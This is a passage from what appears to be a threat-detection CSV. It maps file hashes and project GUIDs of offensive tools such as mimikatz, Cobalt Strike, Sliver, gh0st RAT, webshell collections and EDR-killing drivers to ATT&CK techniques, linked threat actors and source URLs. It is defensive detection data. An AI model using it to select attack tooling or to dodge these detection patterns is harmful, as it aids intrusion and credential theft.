an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","0","#filehash","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","31087" "*911be80c0cbcc8c3bc351a3e60db0d7494858603*",".{0,1000}911be80c0cbcc8c3bc351a3e60db0d7494858603.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","31089" "*911db175f6d08bcc3c3f26bd5ea264434bb612533b8e7beceef307d35adf0f10*",".{0,1000}911db175f6d08bcc3c3f26bd5ea264434bb612533b8e7beceef307d35adf0f10.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31090" "*912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9*",".{0,1000}912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS 
SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31091" "*912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9*",".{0,1000}912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31092" "*9120da326f6d13c492ca42da217b25a24515ca0d2f468acde8ddb5d5417c6652*",".{0,1000}9120da326f6d13c492ca42da217b25a24515ca0d2f468acde8ddb5d5417c6652.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","31093" "*9124efc00f77a6de28cc12e89c35e1eccde6523a5304556613c45c797b7efaeb*",".{0,1000}9124efc00f77a6de28cc12e89c35e1eccde6523a5304556613c45c797b7efaeb.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31094" "*91283687ba9f56c07f0664807a9387edd6f40e50607fc3c757bcd34b28eb1cd8*",".{0,1000}91283687ba9f56c07f0664807a9387edd6f40e50607fc3c757bcd34b28eb1cd8.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","0","#filehash","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","31095" 
"*91292bac-72b4-4aab-9e5f-2bc1843c8ea3*",".{0,1000}91292bac\-72b4\-4aab\-9e5f\-2bc1843c8ea3.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","#GUIDproject","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","31096" "*912a5d11b4160a54f83f94ae434abb5f5b85915aa208bf086195a57ddaaee651*",".{0,1000}912a5d11b4160a54f83f94ae434abb5f5b85915aa208bf086195a57ddaaee651.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31097" "*912ddcb057ae0b41311be77a00ad2952ab1521c12fc712284a4fbfb58f1105be*",".{0,1000}912ddcb057ae0b41311be77a00ad2952ab1521c12fc712284a4fbfb58f1105be.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - 
Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31098" "*912f812564e87c31a162cfe0626f3a6cbc5b6864deedbfefc31f6d321859ade3*",".{0,1000}912f812564e87c31a162cfe0626f3a6cbc5b6864deedbfefc31f6d321859ade3.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","31099" "*91302dd386709f514908c61d52d0e917ef6c4db866ee9f9f1b387ceb1e87cd7a*",".{0,1000}91302dd386709f514908c61d52d0e917ef6c4db866ee9f9f1b387ceb1e87cd7a.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","31100" 
"*9131d13db3cdf4fd6578488dda52fe4d714f4d20c8266f22d1113e049f1e4a53*",".{0,1000}9131d13db3cdf4fd6578488dda52fe4d714f4d20c8266f22d1113e049f1e4a53.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31101" "*91338f8ea41d0175c0c1cb5a15effe05b35378ec5a3596ca3cca7fee9e3369e9*",".{0,1000}91338f8ea41d0175c0c1cb5a15effe05b35378ec5a3596ca3cca7fee9e3369e9.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","31102" "*913a1f53ad58f76c2ebd3952974eacbb24e01a5b3206a4079b1b111416a70d46*",".{0,1000}913a1f53ad58f76c2ebd3952974eacbb24e01a5b3206a4079b1b111416a70d46.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31104" "*913d774e5cf0bfad4adfa900997f7a1a*",".{0,1000}913d774e5cf0bfad4adfa900997f7a1a.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 
one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","31106" "*91474981006a8437b1f628985dfc79c56dac4cb73dbcbebed1c01211149aef81*",".{0,1000}91474981006a8437b1f628985dfc79c56dac4cb73dbcbebed1c01211149aef81.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 
- TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31108" "*91502e94bd83b8803e91d20d1b231c112d65561f588b92e888982f7753374e8d*",".{0,1000}91502e94bd83b8803e91d20d1b231c112d65561f588b92e888982f7753374e8d.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#filehash","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","31111" "*9157a48c53ca7a4543bac5b771886c87ea407bab6bbb053b50bc22709111d572*",".{0,1000}9157a48c53ca7a4543bac5b771886c87ea407bab6bbb053b50bc22709111d572.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31112" "*91648f9d2729f57cae268424fd8a8cc245094feeed02e9b0d25ae700913ef80b*",".{0,1000}91648f9d2729f57cae268424fd8a8cc245094feeed02e9b0d25ae700913ef80b.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","31113" 
"*9165d4f3036919a96b86d24b64d75d692802c7513f2b3054b20be40c212240a5*",".{0,1000}9165d4f3036919a96b86d24b64d75d692802c7513f2b3054b20be40c212240a5.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense Evasion","https://github.com/keowu/BadRentdrv2","1","0","#filehash","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","31114" "*9166f6777dfda8e6ac74b2427a25f6be82b6ad43079ac2ba4c56592c2ad405f2*",".{0,1000}9166f6777dfda8e6ac74b2427a25f6be82b6ad43079ac2ba4c56592c2ad405f2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31115" "*916e582e5bcc71068ce6e2051a05772affd07e53f41518e61808b6c0777a1d3f*",".{0,1000}916e582e5bcc71068ce6e2051a05772affd07e53f41518e61808b6c0777a1d3f.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","31116" 
"*9183fb7b9d4dc2bae17ce77d1069811f767fe88d17944c9cb81120af0c239faf*",".{0,1000}9183fb7b9d4dc2bae17ce77d1069811f767fe88d17944c9cb81120af0c239faf.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","31119" "*9188fe2a96fbb147f85f455cb4edad4f21878e269f032556da95e8d0a9889f93*",".{0,1000}9188fe2a96fbb147f85f455cb4edad4f21878e269f032556da95e8d0a9889f93.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31120" "*919057b3379f84209626166b83566ebc0b4b663f6f142bdfbaa303250ca3fb1f*",".{0,1000}919057b3379f84209626166b83566ebc0b4b663f6f142bdfbaa303250ca3fb1f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31121" "*919282a2110d48cdca526f1638e723c84c3f3a3d85525488887b065b476b3887*",".{0,1000}919282a2110d48cdca526f1638e723c84c3f3a3d85525488887b065b476b3887.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - 
T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31122" "*919c2ae72cb629fb51f37c1e9fff1b24a01b2026b58213ad88557e64e8813d90*",".{0,1000}919c2ae72cb629fb51f37c1e9fff1b24a01b2026b58213ad88557e64e8813d90.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31125" "*91a40fb5af592e1b63099fb236a1c955b47c4699197651b9ae1507ecbf4ad2ea*",".{0,1000}91a40fb5af592e1b63099fb236a1c955b47c4699197651b9ae1507ecbf4ad2ea.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - 
HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","31126" "*91a579342f9fd24373e7d273db24aa0f936c9cb7929a3f0dcee357a84173e1eb*",".{0,1000}91a579342f9fd24373e7d273db24aa0f936c9cb7929a3f0dcee357a84173e1eb.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","31127" "*91abf8042d65f120fc30af7618fd310e44e54f69b390ec8f08bc8cb2c251697f*",".{0,1000}91abf8042d65f120fc30af7618fd310e44e54f69b390ec8f08bc8cb2c251697f.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","31130" "*91ad0d9c090714cf7af5de1da071cf52960ac058a0f915ccdf8f2eeb73661b6c*",".{0,1000}91ad0d9c090714cf7af5de1da071cf52960ac058a0f915ccdf8f2eeb73661b6c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31132" 
"*91ae5ce613fa82b7764401fb12fb8977a0b3c78325faa16f30abeb3dfbe9c71a*",".{0,1000}91ae5ce613fa82b7764401fb12fb8977a0b3c78325faa16f30abeb3dfbe9c71a.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","https://www.virustotal.com/gui/file/91ae5ce613fa82b7764401fb12fb8977a0b3c78325faa16f30abeb3dfbe9c71a","10","10","N/A","N/A","N/A","N/A","31133" "*91B12706-DC6A-45DE-97F1-FAF0901FF6AF*",".{0,1000}91B12706\-DC6A\-45DE\-97F1\-FAF0901FF6AF.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","31134" "*91b1c7537e69ff7ade05c1c3a6051c2981a022a11b71c6e355891e294574a066*",".{0,1000}91b1c7537e69ff7ade05c1c3a6051c2981a022a11b71c6e355891e294574a066.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","31136" "*91c355be49a16620621486c0e50c44aa876c0c86c9de0ce5253102b637d1d7dd*",".{0,1000}91c355be49a16620621486c0e50c44aa876c0c86c9de0ce5253102b637d1d7dd.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - 
TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","31139" "*91c48bd880c65a28a50697f38aa6b246db7cb0e629a440c35a9a802d2e9da48c*",".{0,1000}91c48bd880c65a28a50697f38aa6b246db7cb0e629a440c35a9a802d2e9da48c.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","31140" "*91cd0a590f86cbda8e33e5a4d90303f270ed6d17b8b36e50030f5a68beb7a704*",".{0,1000}91cd0a590f86cbda8e33e5a4d90303f270ed6d17b8b36e50030f5a68beb7a704.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31142" 